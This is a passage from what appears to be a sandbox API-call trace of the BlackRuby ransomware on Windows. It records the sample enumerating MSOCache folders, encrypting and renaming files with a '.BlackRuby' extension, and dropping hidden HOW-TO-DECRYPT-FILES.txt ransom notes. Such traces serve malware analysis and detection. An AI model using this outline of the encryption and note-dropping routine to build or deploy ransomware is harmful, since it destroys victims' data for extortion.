Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Encrypted_O6IbRk6pUGqldlEGIlFYNja8D6FjT1nrdvmcLWorqRSa9.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Encrypted_O6IbRk6pUGqldlEGIlFYNja8D6FjT1nrdvmcLWorqRSa9.BlackRuby", lpFilePart=0x0) returned 0x80 [0046.991] GetLastError () returned 0xb7 [0046.991] SetErrorMode (uMode=0x1) returned 0x0 [0046.991] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2c210800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2c210800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x24374040, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x2680)) returned 1 [0046.991] GetLastError () returned 0xb7 [0046.991] SetErrorMode (uMode=0x0) returned 0x1 [0046.991] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Encrypted_O6IbRk6pUGqldlEGIlFYNja8D6FjT1nrdvmcLWorqRSa9.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\encrypted_o6ibrk6pugqldlegilfynja8d6fjt1nrdvmclworqrsa9.blackruby")) returned 1 [0046.991] GetLastError () returned 0xb7 [0046.992] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.992] GetLastError () returned 0xb7 [0046.992] SetErrorMode (uMode=0x1) returned 0x0 [0046.992] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.992] GetLastError () returned 0x5 [0046.993] SetErrorMode (uMode=0x0) returned 0x1 [0046.993] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\ShellUI.MST", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\ShellUI.MST", lpFilePart=0x0) returned 0x4a [0046.993] GetLastError () returned 0x5 [0046.993] SetErrorMode (uMode=0x1) returned 0x0 [0046.993] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\shellui.mst"), fInfoLevelId=0x0, lpFileInformation=0x1c9e45c | out: lpFileInformation=0x1c9e45c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x157c7600, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x157c7600, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0x30de7a90, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xe00)) returned 1 [0046.993] GetLastError () returned 0x5 [0046.993] SetErrorMode (uMode=0x0) returned 0x1 [0046.994] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.994] GetLastError () returned 0x5 [0046.994] SetErrorMode (uMode=0x1) returned 0x0 [0046.994] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.994] GetLastError () returned 0x5 [0046.995] SetErrorMode (uMode=0x0) returned 0x1 [0046.995] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033", lpFilePart=0x0) returned 0x43 [0046.995] GetLastError () returned 0x5 [0046.995] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.995] GetLastError () returned 0x5 [0046.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.995] GetLastError () returned 0x5 [0046.995] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033", lpFilePart=0x0) returned 0x43 [0046.995] GetLastError () returned 0x5 [0046.995] SetErrorMode (uMode=0x1) returned 0x0 [0046.995] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ce0 [0046.995] GetLastError () returned 0x5 [0046.995] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.995] GetLastError () returned 0x5 [0046.995] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.995] GetLastError () returned 0x5 [0046.996] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0046.996] GetLastError () returned 0x12 [0046.996] FindClose (in: hFindFile=0x360ce0 | out: hFindFile=0x360ce0) returned 1 [0046.996] SetErrorMode (uMode=0x0) returned 0x1 [0046.996] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033", lpFilePart=0x0) returned 0x43 [0046.996] GetLastError () returned 0x12 [0046.996] SetErrorMode (uMode=0x1) returned 0x0 [0046.996] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ce0 [0046.996] GetLastError () returned 0x12 [0046.996] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.996] GetLastError () returned 0x12 [0046.996] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.996] GetLastError () returned 0x12 [0046.996] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0046.996] GetLastError () returned 0x12 [0046.997] FindClose (in: hFindFile=0x360ce0 | out: hFindFile=0x360ce0) returned 1 [0046.997] SetErrorMode (uMode=0x0) returned 0x1 [0046.997] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\dwintl20.dll", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\dwintl20.dll", lpFilePart=0x0) returned 0x50 [0046.997] GetLastError () returned 0x12 [0046.997] SetErrorMode (uMode=0x1) returned 0x0 [0046.997] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\1033\\dwintl20.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cbdaf0 | out: lpFileInformation=0x1cbdaf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0x30e5a680, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x1a588)) returned 1 [0046.997] GetLastError () returned 0x12 [0046.997] SetErrorMode (uMode=0x0) returned 0x1 [0046.998] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5c [0046.998] GetLastError () returned 0x12 [0046.998] SetErrorMode (uMode=0x1) returned 0x0 [0046.998] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\1033\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.998] GetLastError () returned 0x0 [0046.998] GetFileType (hFile=0x184) returned 0x1 [0046.998] SetErrorMode (uMode=0x0) returned 0x1 [0046.998] GetFileType (hFile=0x184) returned 0x1 [0046.998] WriteFile (in: hFile=0x184, lpBuffer=0x1cd98c8*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed2c, lpOverlapped=0x0 | out: lpBuffer=0x1cd98c8*, lpNumberOfBytesWritten=0x18ed2c*=0x18da, lpOverlapped=0x0) returned 1 [0046.999] GetLastError () returned 0x0 [0046.999] CloseHandle (hObject=0x184) returned 1 [0046.999] GetLastError () returned 0x0 [0046.999] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5c [0046.999] GetLastError () returned 0x0 [0046.999] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0046.999] GetLastError () returned 0x0 [0047.000] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0047.000] GetLastError () returned 0x0 [0047.000] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.000] GetLastError () returned 0x0 [0047.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0047.000] GetLastError () returned 0x0 [0047.000] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0047.000] GetLastError () returned 0x0 [0047.000] SetErrorMode (uMode=0x1) returned 0x0 [0047.000] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ce0 [0047.016] GetLastError () returned 0x0 [0047.016] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.016] GetLastError () returned 0x0 [0047.016] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.016] GetLastError () returned 0x0 [0047.016] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.016] GetLastError () returned 0x0 [0047.016] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.016] GetLastError () returned 0x0 [0047.017] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.017] GetLastError () returned 0x0 [0047.017] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.017] GetLastError () returned 0x12 [0047.017] FindClose (in: hFindFile=0x360ce0 | out: hFindFile=0x360ce0) returned 1 [0047.018] SetErrorMode (uMode=0x0) returned 0x1 [0047.018] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0047.018] GetLastError () returned 0x12 [0047.018] SetErrorMode (uMode=0x1) returned 0x0 [0047.018] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ce0 [0047.018] GetLastError () returned 0x12 [0047.019] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.019] GetLastError () returned 0x12 [0047.019] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.019] GetLastError () returned 0x12 [0047.019] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.019] GetLastError () returned 0x12 [0047.019] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.019] GetLastError () returned 0x12 [0047.019] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.019] GetLastError () returned 0x12 [0047.019] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.019] GetLastError () returned 0x12 [0047.019] FindClose (in: hFindFile=0x360ce0 | out: hFindFile=0x360ce0) returned 1 [0047.020] SetErrorMode (uMode=0x0) returned 0x1 [0047.020] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.msi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.msi", lpFilePart=0x0) returned 0x4f [0047.020] GetLastError () returned 0x12 [0047.020] SetErrorMode (uMode=0x1) returned 0x0 [0047.020] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\accessmuiset.msi"), fInfoLevelId=0x0, lpFileInformation=0x1cdd2c8 | out: lpFileInformation=0x1cdd2c8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2297a000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2297a000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x3b0cfc30, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x9ec00)) returned 1 [0047.021] GetLastError () returned 0x12 [0047.021] SetErrorMode (uMode=0x0) returned 0x1 [0047.022] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.022] GetLastError () returned 0x12 [0047.022] SetErrorMode (uMode=0x1) returned 0x0 [0047.022] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.022] GetLastError () returned 0x0 [0047.022] GetFileType (hFile=0x184) returned 0x1 [0047.022] SetErrorMode (uMode=0x0) returned 0x1 [0047.022] GetFileType (hFile=0x184) returned 0x1 [0047.022] WriteFile (in: hFile=0x184, lpBuffer=0x1cf8fa0*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1cf8fa0*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0047.023] GetLastError () returned 0x0 [0047.023] CloseHandle (hObject=0x184) returned 1 [0047.024] GetLastError () returned 0x0 [0047.024] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.024] GetLastError () returned 0x0 [0047.024] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0047.024] GetLastError () returned 0x0 [0047.024] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0047.024] GetLastError () returned 0x0 [0047.024] SetErrorMode (uMode=0x1) returned 0x0 [0047.024] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\accessmuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x1cfacac | out: lpFileInformation=0x1cfacac*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x39c476a0, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x333)) returned 1 [0047.024] GetLastError () returned 0x0 [0047.024] SetErrorMode (uMode=0x0) returned 0x1 [0047.024] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0047.024] GetLastError () returned 0x0 [0047.024] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0047.024] GetLastError () returned 0x0 [0047.024] SetErrorMode (uMode=0x1) returned 0x0 [0047.024] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.025] GetLastError () returned 0x0 [0047.025] GetFileType (hFile=0x184) returned 0x1 [0047.025] SetErrorMode (uMode=0x0) returned 0x1 [0047.025] GetFileType (hFile=0x184) returned 0x1 [0047.025] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x333 [0047.025] GetLastError () returned 0x0 [0047.025] ReadFile (in: hFile=0x184, lpBuffer=0x1cfd034, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1cfd034*, lpNumberOfBytesRead=0x18ed84*=0x333, lpOverlapped=0x0) returned 1 [0047.040] GetLastError () returned 0x0 [0047.040] CloseHandle (hObject=0x184) returned 1 [0047.040] GetLastError () returned 0x0 [0047.040] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0047.040] GetLastError () returned 0x0 [0047.041] SetErrorMode (uMode=0x1) returned 0x0 [0047.041] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\accessmuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x39c476a0, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x333)) returned 1 [0047.041] GetLastError () returned 0x0 [0047.041] SetErrorMode (uMode=0x0) returned 0x1 [0047.041] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c790) returned 1 [0047.041] GetLastError () returned 0x0 [0047.075] CryptImportKey (in: hProv=0x37c790, pbData=0x1b5a580, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360da0) returned 1 [0047.075] GetLastError () returned 0x0 [0047.075] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.075] GetLastError () returned 0x0 [0047.080] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.080] GetLastError () returned 0x0 [0047.080] CryptDuplicateKey (in: hKey=0x360da0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ea0) returned 1 [0047.080] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.080] GetLastError () returned 0x0 [0047.080] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x4, pbData=0x1b875cc*=0x1, dwFlags=0x0) returned 1 [0047.080] GetLastError () returned 0x0 [0047.080] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x1, pbData=0x1b87598, dwFlags=0x0) returned 1 [0047.080] GetLastError () returned 0x0 [0047.080] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b87614*, pdwDataLen=0x18ed74*=0x430, dwBufLen=0x430 | out: pbData=0x1b87614*, pdwDataLen=0x18ed74*=0x430) returned 1 [0047.080] GetLastError () returned 0x0 [0047.080] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b87ea0*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b87ea0*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0047.080] GetLastError () returned 0x0 [0047.080] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b87ed0*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b87ed0*, pdwDataLen=0x18ed94*=0x10) returned 1 [0047.080] GetLastError () returned 0x0 [0047.081] CryptDestroyKey (hKey=0x360da0) returned 1 [0047.081] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0047.081] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0047.081] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.xml", lpFilePart=0x0) returned 0x4f [0047.081] GetLastError () returned 0x0 [0047.081] SetErrorMode (uMode=0x1) returned 0x0 [0047.081] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-0000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.082] GetLastError () returned 0xb7 [0047.082] GetFileType (hFile=0x184) returned 0x1 [0047.082] SetErrorMode (uMode=0x0) returned 0x1 [0047.082] GetFileType (hFile=0x184) returned 0x1 [0047.083] CloseHandle (hObject=0x184) 